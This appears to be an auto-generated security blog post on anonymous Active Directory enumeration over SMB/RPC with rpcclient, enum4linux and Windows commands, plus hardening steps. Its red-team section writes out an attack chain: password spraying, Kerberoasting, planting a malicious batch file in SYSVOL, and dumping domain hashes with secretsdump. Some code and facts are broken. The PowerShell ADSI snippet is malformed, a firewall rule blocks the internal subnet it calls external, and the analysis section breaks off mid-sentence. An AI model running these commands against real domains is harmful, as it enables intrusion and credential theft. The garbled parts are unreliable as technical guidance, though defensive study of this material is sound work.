Listen to this Post
Introduction:
Active Directory (AD) remains the central identity store for most enterprises, but its reliance on legacy protocols like SMB and RPC creates a sprawling attack surface. Net RPC, a component of the Samba suite, allows attackers—and ethical hackers—to remotely query AD for domain users, groups, password policies, and SID mappings without any credentials, effectively mapping the entire domain for privilege escalation.
Learning Objectives:
- Understand how Net RPC interacts with SMB/RPC services to perform unauthenticated AD enumeration.
- Execute practical enumeration commands using
rpcclient,enum4linux, and native Windows tools to extract critical domain data. - Implement defensive hardening measures to detect, block, and mitigate anonymous SMB/RPC reconnaissance.
You Should Know
- Setting Up Net RPC and Performing Basic Null Session Enumeration
Net RPC is part of the Samba client suite. Attackers leverage a “null session” (anonymous login) to connect to a Domain Controller’s SMB/RPC endpoint. The following steps demonstrate how to install the tools and extract foundational AD information.
Step‑by‑step guide (Linux – Kali/Parrot/Ubuntu):
Install Samba client sudo apt update && sudo apt install samba-client -y Identify a Domain Controller (e.g., via Nmap) nmap -p445,139 --open -T4 192.168.1.0/24 Connect anonymously to the target DC rpcclient -U "" -N 192.168.1.10
Once inside the `rpcclient` shell, run these commands:
Server and domain information srvinfo lsaquery Domain users enumdomusers Domain groups enumdomgroups Domain name and SID getdompwinfo
What this does:
The `-U “” -N` flags specify an empty username and null password, creating an anonymous SMB session. From there, RPC calls like `enumdomusers` query the SAM database for user names, revealing valid logon accounts for later password spraying or brute‑forcing.
2. Extracting Password Policies and SID Mappings
Password policy disclosure is a goldmine for attackers – it reveals lockout thresholds, password complexity, and minimum length, allowing them to craft stealthy brute‑force attacks. SID (Security Identifier) mapping helps associate well‑known RIDs (e.g., 500 for Administrator) with actual usernames.
Step‑by‑step guide (using rpcclient and enum4linux):
From inside rpcclient: getdompwinfo Example output: min_password_length: 7 password_properties: 0x00000001 (DOMAIN_PASSWORD_COMPLEX) lockout_duration: 30 mins Extract SID for the domain lsaquery Map RIDs to users (RID cycling) lookupnames administrator lookupsids S-1-5-21-123456789-1234567890-123456789-500
Automated enumeration with enum4linux:
enum4linux -P 192.168.1.10 Password policy only enum4linux -S 192.168.1.10 Share enumeration enum4linux -U 192.168.1.10 User list enum4linux -a 192.168.1.10 All-in-one (noisy)
Defensive takeaway:
If you see `min_password_length: 0` or lockout_threshold: 0, the domain is severely misconfigured. Attackers will immediately start password guessing without fear of account lockout.
3. Enumerating SMB Shares and Performing RID Bruteforcing
Beyond users and policies, attackers enumerate writable shares (potential persistence points) and perform RID cycling to discover hidden accounts – including service accounts and disabled but still valid users.
Step‑by‑step guide:
List all SMB shares anonymously
rpcclient -U "" -N 192.168.1.10 -c "netshareenumall"
Manual RID cycling (bruteforce)
for rid in {500,501,502,1000..1010}; do
rpcclient -U "" -N 192.168.1.10 -c "lookupsids S-1-5-21-<domain_sid>-$rid"
done
Using enum4linux for RID brute
enum4linux -r 500-2000 192.168.1.10
Sample output of a hidden account:
S-1-5-21-...-1008: unknown\unknown (8) S-1-5-21-...-1009: DOMAIN\svc_backup (1)
The `svc_backup` account likely has high privileges – a prime target for Kerberoasting.
Windows alternative (if RSAT is installed):
Enumerate domain users (requires authenticated context, but useful post‑compromise) net user /domain Enumerate groups net group "Domain Admins" /domain
4. Native Windows Commands for AD Enumeration (Post‑Compromise)
While Net RPC is primarily a Linux tool, red teams often pivot to Windows hosts. Native Windows commands and PowerShell can replicate much of the same enumeration once a foothold is gained.
Step‑by‑step guide (from a domain‑joined Windows host):
Basic domain info nltest /domain_trusts nltest /dsgetdc:DOMAIN_NAME List users and groups net user /domain net group "Domain Admins" /domain net localgroup Administrators SMB share discovery net view \DC01 /all
PowerShell for deeper enumeration (no RSAT required):
Get current domain SID
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$domain.GetDirectoryEntry().objectSid
List all domain users (via ADSI)
$searcher = [bash]"(objectClass=user)"
$searcher.FindAll() | ForEach-Object {$_.Properties.name}
Enumerate password policy
net accounts /domain
Note: Native Windows commands often require an authenticated context. Attackers first use Net RPC anonymously, then switch to Windows tools after credential theft.
5. Defensive Hardening Against SMB/RPC Reconnaissance
Preventing anonymous Net RPC enumeration is straightforward but frequently overlooked. The following steps lock down SMB/RPC on Domain Controllers and member servers.
Step‑by‑step guide (Windows Server hardening):
1. Restrict anonymous null session access
Via Group Policy or registry:
Set RestrictAnonymous = 2 (No access without explicit anonymous permissions) Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RestrictAnonymous" -Value 2 -Type DWord
2. Disable SMBv1 and enforce SMB signing
Disable SMBv1 Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol Enforce SMB signing (Group Policy: Microsoft network client/server: Digitally sign communications) Set-SmbServerConfiguration -RequireSecuritySignature $true -EnableSMB2Protocol $true
3. Block port 445/139 from untrusted networks
Use Windows Firewall or network ACLs:
New-NetFirewallRule -DisplayName "Block SMB from external" -Direction Inbound -Protocol TCP -LocalPort 445,139 -Action Block -RemoteAddress 192.168.1.0/24
4. Monitor for suspicious RPC calls
Enable advanced audit policies:
auditpol /set /subcategory:"SAM" /success:enable /failure:enable auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
Look for Event ID 4624 (anonymous logons) and 5140 (SMB share access).
Linux‑side detection:
Network defenders can use Zeek (formerly Bro) to detect `rpcclient` enumeration:
zeek -C -r capture.pcap smb_rpc.zeek Look for high volumes of SMB session setups with empty usernames.
- Exploiting Misconfigurations for Privilege Escalation (Red Team Perspective)
Once Net RPC reveals weak password policies, unconstrained delegation, or SIDHistory, attackers escalate from enumeration to exploitation. This section shows how to chain the gathered information.
Step‑by‑step guide (for authorized penetration testing only):
1. Crack password policy weaknesses
If `min_password_length < 8` and lockout_threshold = 0, launch a password spraying attack:
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123' --continue-on-success
2. Kerberoast high‑privileged accounts
Use the list of domain users from `enumdomusers` to request service tickets:
impacket-GetUserSPNs -request -dc-ip 192.168.1.10 DOMAIN/users.txt
3. Pivot via writable SMB shares
If `netshareenumall` shows a writable `NETLOGON` or `SYSVOL` misconfiguration, plant a malicious script:
smbclient //192.168.1.10/SYSVOL -N -c "put evil.bat"
4. Extract NTDS.dit using RPC
With a captured domain admin hash, use Impacket’s secretsdump:
impacket-secretsdump -just-dc-ntlm DOMAIN/[email protected]
Mitigation summary:
- Enforce `RestrictAnonymous=2` and SMB signing.
- Set `min_password_length=12` and enable lockout policies.
- Regularly audit for writable shares and over‑privileged service accounts.
What Undercode Say
Key Takeaway 1:
Net RPC transforms legacy SMB/RPC protocols into a low‑effort AD reconnaissance engine – no credentials, no exploit, just native Windows functionality exposed over the network.
Key Takeaway 2:
Anonymous null session enumeration remains a persistent blind spot. Many organizations disable SMBv1 but leave RestrictAnonymous at default (0 or 1), allowing attackers to extract the entire domain user list and password policy in seconds.
Analysis (10 lines):
The simplicity of `rpcclient -U “” -N
Prediction
As on‑premises Active Directory continues to coexist with Azure AD and Entra ID, attackers will blend legacy SMB/RPC enumeration (via Net RPC) with modern cloud reconnaissance. Expect automated frameworks that first map an organization’s on‑prem AD structure using null sessions, then pivot to Azure AD Connect misconfigurations – such as over‑privileged sync accounts or unhardened pass‑through authentication – to compromise the entire hybrid tenant. Defenders will finally be forced to deprecate NTLM entirely, enforce SMB over QUIC for remote access, and migrate to strictly Kerberos‑only authentication with frequent ticket rotation. Additionally, Microsoft may introduce a “legacy protocol kill‑switch” in future Windows Server releases, breaking Net RPC enumeration for good – but until then, every red team should keep `rpcclient` on their USB drive.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Active Directory – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
